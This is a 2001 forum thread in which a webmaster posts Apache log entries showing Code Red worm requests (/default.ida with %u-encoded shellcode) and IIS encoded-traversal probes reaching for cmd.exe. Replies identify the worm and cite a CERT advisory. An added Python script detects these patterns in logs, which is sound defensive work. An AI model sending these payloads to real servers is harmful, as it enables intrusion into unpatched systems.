I think someone is trying to hack me.


Marsh Posté on 29-09-2001 at 13:05:35

I'm seeing some suspicious things in my Apache server logs:
62.11.34.190 - - [23/Sep/2001:23:25:20 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.57.105.144 - - [23/Sep/2001:23:33:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.4.166.209 - - [24/Sep/2001:00:04:44 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.4.178.245 - - [24/Sep/2001:00:27:51 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.4.178.245 - - [24/Sep/2001:02:40:56 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.81.157.44 - - [24/Sep/2001:03:06:55 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
203.65.201.241 - - [24/Sep/2001:05:46:04 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 279
62.4.139.111 - - [24/Sep/2001:20:36:47 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:49 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:57 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
62.4.139.111 - - [24/Sep/2001:20:36:59 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
62.4.139.111 - - [24/Sep/2001:20:37:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
62.4.139.111 - - [24/Sep/2001:20:37:14 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
62.4.139.111 - - [24/Sep/2001:20:37:22 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
 
 
So, in my opinion, the guy is trying to hack me with buffer overflows and is trying to list the files on my hard drive. Fortunately, it isn't getting through. What can I do? Tracing it, the connection appears to come from the ISP www.zeelandnet.nl. In my opinion, he must be using their proxy. What can I do about this?


Marsh Posté on 29-09-2001 at 13:19:57

Hello there
Don't worry, it's an attack by the Code Red worm (or one of its many derivatives), which looks for a hole in Microsoft's IIS servers. It's a worm that spreads from server to server by attacking IPs at random (well, more or less, that's how it works). Nothing serious if your server isn't IIS (which is the case  :)
It's annoying, but there's nothing to be done about it; I got hit too on a server...
 
Someone correct me if I'm wrong    :sarcastic:

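A way to triage an Apache access log for the two request patterns shown in the first post: the long `/default.ida?` request with `%u` words, and the encoded `..` traversal toward `cmd.exe`. This is an added example, not part of the original thread; the function names and labels are hypothetical, the sample lines are constructed, and it assumes one log entry per line (not wrapped as in the paste above).

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# .ida request: 100+ repeats of one filler letter, then %uXXXX words
IDA_RE = re.compile(r'^/default\.ida\?([A-Za-z])\1{99,}(?:%u[0-9a-fA-F]{4})+')

def decode_rounds(path, max_rounds=3):
    """Percent-decode until stable; return (bytes, rounds that changed it)."""
    data, rounds = path.encode("latin-1"), 0
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(target):
    """Label a request target, or return None if it matches neither pattern."""
    if IDA_RE.match(target):
        return "ida-overflow"
    data, rounds = decode_rounds(target.split("?", 1)[0])
    if b"cmd.exe" not in data.lower():
        return None
    if b"\xc0" in data or b"\xc1" in data:  # bytes valid UTF-8 never contains
        return "traversal-overlong-utf8"
    if rounds > 1 and (b"../" in data or b"..\\" in data):
        return "traversal-double-encoding"
    return None

def scan(lines):
    """Count (label, served) pairs; served is True only for a 2xx status."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        label = classify(m.group(2)) if m else None
        if label:
            hits[(label, m.group(3).startswith("2"))] += 1
    return hits

# Constructed sample lines modelled on the log above (documentation IP addresses).
SAMPLE = [
    '192.0.2.10 - - [23/Sep/2001:23:25:20 +0200] "GET /default.ida?' + "X" * 224 + '%u9090%u6858%ucbd3%u7801%u00=a  HTTP/1.0" 404 279',
    '192.0.2.20 - - [24/Sep/2001:20:36:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305',
    '192.0.2.20 - - [24/Sep/2001:20:36:59 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289',
    '192.0.2.30 - - [24/Sep/2001:21:00:00 +0200] "GET /index.html HTTP/1.0" 200 1024',
]
```

Calling `scan(SAMPLE)` gives a count per pattern; any entry whose `served` flag is `True` is the one to investigate, since it means the server answered the probe with a 2xx instead of rejecting it.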

Marsh Posté on 29-09-2001 at 13:21:04

For additional info
 
http://www.cert.org/advisories/CA-2001-19.html
 
and there you go :)


Marsh Posté on 29-09-2001 at 13:21:04

ok, that's fine then :D
That would mean that server is infected by the virus... too bad for them! :D


Marsh Posté on 29-09-2001 at 13:21:48

thanks :)
 
niark niark, fuck IIS :gun:


Marsh Posté on 29-09-2001 at 13:27:28

Web, what the heck are you doing here :??:  :D
 
Do you think that's right  :ouch: and what about Auchan, how are they going to keep running if you spend your day on the net doing nothing? :hap:  
 
See you :p  :hello:


---------------
Taxes impoverish the ignorant and enrich the knowledgeable.